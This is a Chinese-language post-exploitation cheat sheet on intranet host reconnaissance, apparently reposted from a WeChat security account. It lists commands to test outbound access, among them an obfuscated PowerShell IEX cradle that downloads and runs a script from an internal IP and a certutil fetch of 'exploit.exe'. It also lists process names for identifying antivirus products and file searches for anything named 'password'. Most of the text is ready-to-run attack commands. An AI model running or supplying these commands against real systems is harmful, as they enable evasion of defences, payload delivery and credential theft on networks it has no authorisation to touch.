【内网渗透】- 主机信息搜集

1. 判断是否出网2. 进程列表（杀软）3. tcp连接情况（端口）4. 查看在线用户5. 判断Windows主机是否在域内6. net use 连接信息7. 敏感文件快速查找

1. 判断是否出网

# dns - linux
ping -c 2 aa.dnslog.cn
ping -c 2 114.114.114.114

# dns - win
ping -n 2 aa.dnslog.cn
ping -n 2 114.114.114.114

# http - linux
curl http://10.10.10.10/xx
## 通过tcp判断
nc -lp 8888 -vv
cat < /dev/tcp/10.10.10.10/8888

# http - win
echo set-alias -name xz -value IEX;x^z (New-Object "Ne`T.WeB`ClienT").d^o^w^n^l^o^a^d^s^t^r^i^n^g('ht'+'tP://10'+'.10.10.245'+':8000/a') | p^o^w^e^r^s^h^e^l^l -

start iexplore http://cfbyx2.dnslog.cn
#等待一会kill
taskkill /F /IM iexplore.exe

certutil.exe -urlcache -split -f http://10.10.10.10:8888/aaa exploit.exe

2. 进程列表（杀软）

# windows

tasklist -v
主机启动的服务：net start

# Linux

ps -elf
ps -aux

whatav：https://github.com/StudyCat404/WhatAV

# 常见的
青藤云相关：Titan
天擎：360EntClient.exe/QAXEntClient 
Windows Defender：msMpEng.exe 
360管家：ZhuDongFangYu.exe 
火绒：HIPS.exe

3. tcp连接情况（端口）

netstat -ano

LISTENING
ESTABLISHED

ss -ano

4. 查看在线用户

# windows

query user

# linux

w

5. 判断Windows主机是否在域内

net time /domain

ipconfig /all

6. net use 连接信息

包括在资源管理窗口查看网络信息，共享信息

net use

7. 敏感文件快速查找

# linux下使用find命令

find / -name "*password*"

# windows下使用dir递归查询

cd C:
dir /s *password*.*

原文始发于微信公众号（信安文摘）：【内网渗透】- 主机信息搜集